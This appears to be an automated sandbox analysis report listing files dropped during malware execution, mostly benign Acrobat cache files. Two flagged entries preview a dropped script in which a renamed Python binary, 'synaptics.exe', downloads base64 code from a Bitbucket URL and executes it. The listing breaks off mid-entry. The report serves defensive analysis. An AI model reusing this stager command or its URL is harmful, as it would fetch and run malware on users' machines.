                                                                                                                                                                                      SHA1:18AB7B6FE86193DF108A5A09E504230892DE453E
                                                                                                                                                                                      SHA-256:B4893ED4890874D0466FCA49960D765DD4C2D3948A47D69584F5CC51BBBFA4C9
                                                                                                                                                                                      SHA-512:B2EBE575F3252FF7ABEBAB23FC0572FC8586E80D902D5A731FB7BD030FAA47D124240012E92FFE41A841FA2A65C7FB110AF7FB9AB6E430395A80E925283E2D4D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...............p.......jf......p.......p.......p.......}.......}...............p.......p.......pd......p......Rich............PE..L.....,d...........!......$...........$.......$...............................B......3@...@..........................%:.......:.|.....?...............?../....?.l1..(.9.T.............................9.@.............$..............................text.....$.......$................. ..`.rdata...F....$..H....$.............@..@.data.........;.......:.............@...PyRuntimh.....?.......<.............@....rsrc.........?.......<.............@..@.reloc..l1....?..2....<.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):100120
                                                                                                                                                                                      Entropy (8bit):6.420724895344148
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:93b37AhIxHHWMpdPa5wiE21M8kJIGFvb1Cwv/O5sX7Sy1Px0e:977ASwMpdCq/IM8uIGf1/O5sXzx0e
                                                                                                                                                                                      MD5:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                      SHA1:69535B162FF00A1454BA62D6FABA549B966D937F
                                                                                                                                                                                      SHA-256:FF507B25AF4B3E43BE7E351EC12B483FE46BDBC5656BAAE6AD0490C20B56E730
                                                                                                                                                                                      SHA-512:6D8042A6C8E72F76B2796B6A33978861ABA2CFD8B3F8DE2088BBFF7EA76D91834C86FA230F16C1FDDAE3BF52B101C61CB19EA8D30C6668408D86B2003ABD0967
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.)./.G./.G./.G.&...%.G.}.F.-.G.}.B.<.G.}.C.#.G.}.D...G...F.,.G.d.F.-.G./.F...G...O...G......G...E...G.Rich/.G.................PE..L.....,d.....................H......n........ ....@.................................p.....@.................................l%.......@..x5...........X.../......\....!..T...........................X!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x5...@...6... ..............@..@.reloc..\............V..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):76168
                                                                                                                                                                                      Entropy (8bit):6.765544990184352
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:zHHuqvERNjBwySXtVaSvrgOFw9RxKMn5ecbCKnIY7:zHHZMRNjKySdLcOiH5ecbCKnN
                                                                                                                                                                                      MD5:1A84957B6E681FCA057160CD04E26B27
                                                                                                                                                                                      SHA1:8D7E4C98D1EC858DB26A3540BAAAA9BBF96B5BFE
                                                                                                                                                                                      SHA-256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
                                                                                                                                                                                      SHA-512:5F54C9E87F2510C56F3CF2CEEB5B5AD7711ABD9F85A1FF84E74DD82D15181505E7E5428EAE6FF823F1190964EB0A82A569273A4562EC4131CECFA00A9D0D02AA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...>|.a.........."!.........................................................@......{.....@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):256
                                                                                                                                                                                      Entropy (8bit):5.289068927221856
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:oNaHxv2kgICuW8QwZ21TWk6NO+xLAdoMDKinxuUoIQJa97v:oY0ICv8/5kmO+x0WM+sxuUoJ2v
                                                                                                                                                                                      MD5:591980E9C2488D3E7F909930063B4FA2
                                                                                                                                                                                      SHA1:3ADE748E0FFE3CBB4A1A60B28242C99DD5523308
                                                                                                                                                                                      SHA-256:14E648A99539B929BF6A0D7B39591A6E088163C4B23DCE2D21CC45B5B337E17E
                                                                                                                                                                                      SHA-512:E67C928264D96681A0BDB5F2EDC0C4271028EA2BA4251DF8F1DAEA53B21C658EE084E068E8F1DB370335FB41F5C6049A258F3BD21CD6435A78CFB47C4EC4653A
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:C:\Users\Public\QExvbmVOb25l\synaptics.exe -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))" ..
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):264
                                                                                                                                                                                      Entropy (8bit):5.346182192449493
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:QHWOaHxv2kgICuW8QwZ21TWk6NO+xLAdoMDKinxuUoIQJa97v:QHw0ICv8/5kmO+x0WM+sxuUoJ2v
                                                                                                                                                                                      MD5:AA616B57A62C4D27167D01720DCFA20A
                                                                                                                                                                                      SHA1:D3526714A3C5ACD7C326EAB865E26C32247806D2
                                                                                                                                                                                      SHA-256:09B93E24BE863EC82D8D9F03A17591490E5CFF7817BBC41D90342D3AC37438D7
                                                                                                                                                                                      SHA-512:09EFC03079B5C8669A6608EE8F379BB2DBB6DE627B9A843D098CF47C81CF338AAD6539933395CAFC9A451E204E5111F4209137320862653305826147987F9410
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:..&cls..C:\Users\Public\QExvbmVOb25l\synaptics.exe -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))" ..
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15
                                                                                                                                                                                      Entropy (8bit):3.7735572622751845
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:RRriov:3rb
                                                                                                                                                                                      MD5:7FC149CA05FAC524FACC140040FC4ECA
                                                                                                                                                                                      SHA1:787D7431F8F3E8BE035BC75BAA8F080EDF4E5E2D
                                                                                                                                                                                      SHA-256:2BF2801F119A2D847AEB00F72316B7B81DC703D255DB80220F3E56A0D3D41BA4
                                                                                                                                                                                      SHA-512:40981CCB2363BB77765FFCCB0321C12A06DF1681A4CF3A36CDDB9D77DD78B1A29EB098109F2C46873F6B46DD56B3839DA983201BAC3BFDF62C1444A4C5782405
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview://4mY2xzDQo= ..
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):290
                                                                                                                                                                                      Entropy (8bit):5.237148201719993
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:HU4uvwyq2PRN2nKuAl9OmbnIFUt8YU4uK/1Zmw+YU4uKpRkwORN2nKuAl9OmbjLJ:YvwyvaHAahFUt836/+3SR5JHAaSJ
                                                                                                                                                                                      MD5:86A6187EB600D7B2D2C221B2C135B5DC
                                                                                                                                                                                      SHA1:FF661DD175165B3F82E8A13ABE5F04522A5045C4
                                                                                                                                                                                      SHA-256:23FDC3489F1DAB1241BA470CC7CB92FFA266981267F2648B1D785CA3F9EA4780
                                                                                                                                                                                      SHA-512:91F1D5EEAC3BAC03728892A10C9A9A353057649A20908942A5C0DD02E7FAD1B6D62D1C7D5C560F1109429AC296054949C907820B613C63039D0081829F71E290
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:2024/11/12-09:06:53.845 12e4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-09:06:53.847 12e4 Recovering log #3.2024/11/12-09:06:53.847 12e4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):290
                                                                                                                                                                                      Entropy (8bit):5.237148201719993
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:HU4uvwyq2PRN2nKuAl9OmbnIFUt8YU4uK/1Zmw+YU4uKpRkwORN2nKuAl9OmbjLJ:YvwyvaHAahFUt836/+3SR5JHAaSJ
                                                                                                                                                                                      MD5:86A6187EB600D7B2D2C221B2C135B5DC
                                                                                                                                                                                      SHA1:FF661DD175165B3F82E8A13ABE5F04522A5045C4
                                                                                                                                                                                      SHA-256:23FDC3489F1DAB1241BA470CC7CB92FFA266981267F2648B1D785CA3F9EA4780
                                                                                                                                                                                      SHA-512:91F1D5EEAC3BAC03728892A10C9A9A353057649A20908942A5C0DD02E7FAD1B6D62D1C7D5C560F1109429AC296054949C907820B613C63039D0081829F71E290
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:2024/11/12-09:06:53.845 12e4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-09:06:53.847 12e4 Recovering log #3.2024/11/12-09:06:53.847 12e4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                      Entropy (8bit):5.149922434479921
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:HU4utOq2PRN2nKuAl9Ombzo2jMGIFUt8YU4uXXZmw+YU4uPuFkwORN2nKuAl9OmT:YYvaHAa8uFUt83n/+3K5JHAa8RJ
                                                                                                                                                                                      MD5:AB4F36560C806391EADDEDE89B11472C
                                                                                                                                                                                      SHA1:F9967A5329063161B6AEF9FA52EB144394CA73F1
                                                                                                                                                                                      SHA-256:16C4FFC6AF1D171A1B69EEF160284B8D312005865264468BE667B02205305FA7
                                                                                                                                                                                      SHA-512:4B99A5F04848CE6B0F8A0D1BB32D4BB5811E5EDAD47D3EF4D1F54D842B3AC05C9ED32B67E1AB4B849DC6EF45931C8E582410B38D1EA43FBEFD465F863D0559DD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:2024/11/12-09:06:53.612 a00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/12-09:06:53.618 a00 Recovering log #3.2024/11/12-09:06:53.619 a00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                      Entropy (8bit):5.149922434479921
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:HU4utOq2PRN2nKuAl9Ombzo2jMGIFUt8YU4uXXZmw+YU4uPuFkwORN2nKuAl9OmT:YYvaHAa8uFUt83n/+3K5JHAa8RJ
                                                                                                                                                                                      MD5:AB4F36560C806391EADDEDE89B11472C
                                                                                                                                                                                      SHA1:F9967A5329063161B6AEF9FA52EB144394CA73F1
                                                                                                                                                                                      SHA-256:16C4FFC6AF1D171A1B69EEF160284B8D312005865264468BE667B02205305FA7
                                                                                                                                                                                      SHA-512:4B99A5F04848CE6B0F8A0D1BB32D4BB5811E5EDAD47D3EF4D1F54D842B3AC05C9ED32B67E1AB4B849DC6EF45931C8E582410B38D1EA43FBEFD465F863D0559DD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:2024/11/12-09:06:53.612 a00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/12-09:06:53.618 a00 Recovering log #3.2024/11/12-09:06:53.619 a00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):403
                                                                                                                                                                                      Entropy (8bit):4.953858338552356
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                                                                      MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                                                                      SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                                                                      SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                                                                      SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):403
                                                                                                                                                                                      Entropy (8bit):4.953858338552356
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                                                                      MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                                                                      SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                                                                      SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                                                                      SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):403
                                                                                                                                                                                      Entropy (8bit):4.953858338552356
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                                                                      MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                                                                      SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                                                                      SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                                                                      SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):403
                                                                                                                                                                                      Entropy (8bit):4.991912620470644
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:YHO8sq3sBdOg2HhAcaq3QYiubrP7E4T3y:YXstdMHx3QYhbz7nby
                                                                                                                                                                                      MD5:7873A0D879B95FDC583920C507BF7F68
                                                                                                                                                                                      SHA1:5D81D160007363B00155F5714EB790092CF449B6
                                                                                                                                                                                      SHA-256:7FFB9D80D2A1BD06AF0C1656D6D6FD9D40154CCA6B1438D9112115E1329870A3
                                                                                                                                                                                      SHA-512:5B045873A866FC18C5AB7A6F1E8A7C55BF1D176042484A5293A24F9EEE0F2EAD28099ACD3CB358FE318C84B0AA636177244401B9682693D3C01FD3610D8B0BC3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375980419382457","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":527253},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7233
                                                                                                                                                                                      Entropy (8bit):5.2432082247515535
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:OLT0bTIeYa51Ogu/0OZARBT8kN88qfVG9WASciksI9rlcQPj8ZfTXCXncMkMhW8L:Yk31JsnTBVmpJL
                                                                                                                                                                                      MD5:A567EA39E5B03A4B13C5068AF7CEECC6
                                                                                                                                                                                      SHA1:8EF269876352B1CE3417795040AB5D309DCE5399
                                                                                                                                                                                      SHA-256:A46B273D2F02F01045C6AA25C28C1148847F8395D8C2461A917B184CAA7B3437
                                                                                                                                                                                      SHA-512:59F825406F549F34006A0B7775636E4EF68E4248811BB62159DEA3557803A555738EE1B94423F02F4C938CADE7B5B169EA67894FE1A230C154F07A874A69BBAC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):319
                                                                                                                                                                                      Entropy (8bit):5.158145635987482
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:HU4uLkOq2PRN2nKuAl9OmbzNMxIFUt8YU4u9Zmw+YU4u+kwORN2nKuAl9OmbzNMT:YwOvaHAa8jFUt839/+3+5JHAa84J
                                                                                                                                                                                      MD5:86FAA3E98899C5CFDF0283AEB6F4EAB4
                                                                                                                                                                                      SHA1:34C4EA6DD3266D7B61765367A462F2C4CCC58EEF
                                                                                                                                                                                      SHA-256:FAFCDE77DAD75F372D367236E882E70ECD9BA8FFBE2B9567E3FC067FF9B84E66
                                                                                                                                                                                      SHA-512:901B709CC98BEE2CF8797949D92D84FCD35BF0BA295C51ADE662DC480EB4610E50F2E53CCECF3F76C5734F35C57F474F6E4B0F4064C59442DA9DB6FA1F0021B2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:2024/11/12-09:06:53.918 a00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/12-09:06:53.920 a00 Recovering log #3.2024/11/12-09:06:53.923 a00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):319
                                                                                                                                                                                      Entropy (8bit):5.158145635987482
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:HU4uLkOq2PRN2nKuAl9OmbzNMxIFUt8YU4u9Zmw+YU4u+kwORN2nKuAl9OmbzNMT:YwOvaHAa8jFUt839/+3+5JHAa84J
                                                                                                                                                                                      MD5:86FAA3E98899C5CFDF0283AEB6F4EAB4
                                                                                                                                                                                      SHA1:34C4EA6DD3266D7B61765367A462F2C4CCC58EEF
                                                                                                                                                                                      SHA-256:FAFCDE77DAD75F372D367236E882E70ECD9BA8FFBE2B9567E3FC067FF9B84E66
                                                                                                                                                                                      SHA-512:901B709CC98BEE2CF8797949D92D84FCD35BF0BA295C51ADE662DC480EB4610E50F2E53CCECF3F76C5734F35C57F474F6E4B0F4064C59442DA9DB6FA1F0021B2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:2024/11/12-09:06:53.918 a00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/12-09:06:53.920 a00 Recovering log #3.2024/11/12-09:06:53.923 a00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):65110
                                                                                                                                                                                      Entropy (8bit):2.346424852211112
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:PqibNjPceGElWWWWWWWWWXWWWWWWWWWWWWLWWWWWWWWWWWoxUhZPZtQnD6DGeqE9:PHINxULQDANuP4/flqq04
                                                                                                                                                                                      MD5:CF0A4272829D7E9465EEAC9C69402436
                                                                                                                                                                                      SHA1:66F3C68055E952F5064643F04985B3A7C5E9754A
                                                                                                                                                                                      SHA-256:6C11FC5BB5AAE370F2614D696342AF1C1B037C291006C7F203456AE0217BBA93
                                                                                                                                                                                      SHA-512:F5A014E1007F371372E5317BFEF8593F5D63627DA6BFFCB6AC2725B943EF93E966A365D1144E19B8917A483698F9AB242097E64F1D7851FE1F704812E3737265
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:BMV.......6...(...k...h..... .........................d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...c...L|..V...Y...^...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...c...L|..V...Y...^...d...d...d...d...d...d...d...d...d...d...d...X...X..._...U...^...`...d...[...c...Z...Z..._...V...\...X...d...Y...\...b.
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):57344
                                                                                                                                                                                      Entropy (8bit):3.291927920232006
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                                                                                                                                                      MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                                                                                                                                      SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                                                                                                                                      SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                                                                                                                                      SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:SQLite Rollback Journal
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16928
                                                                                                                                                                                      Entropy (8bit):1.2153913243705503
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:7+tkFrRqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzmn:7MaRqLmFTIF3XmHjBoGGR+jMz+LhiT8n
                                                                                                                                                                                      MD5:5A6D22081AC36F868286900514911849
                                                                                                                                                                                      SHA1:B76133E0BFD9F38B1F6D33504601D15FC5A4C0B9
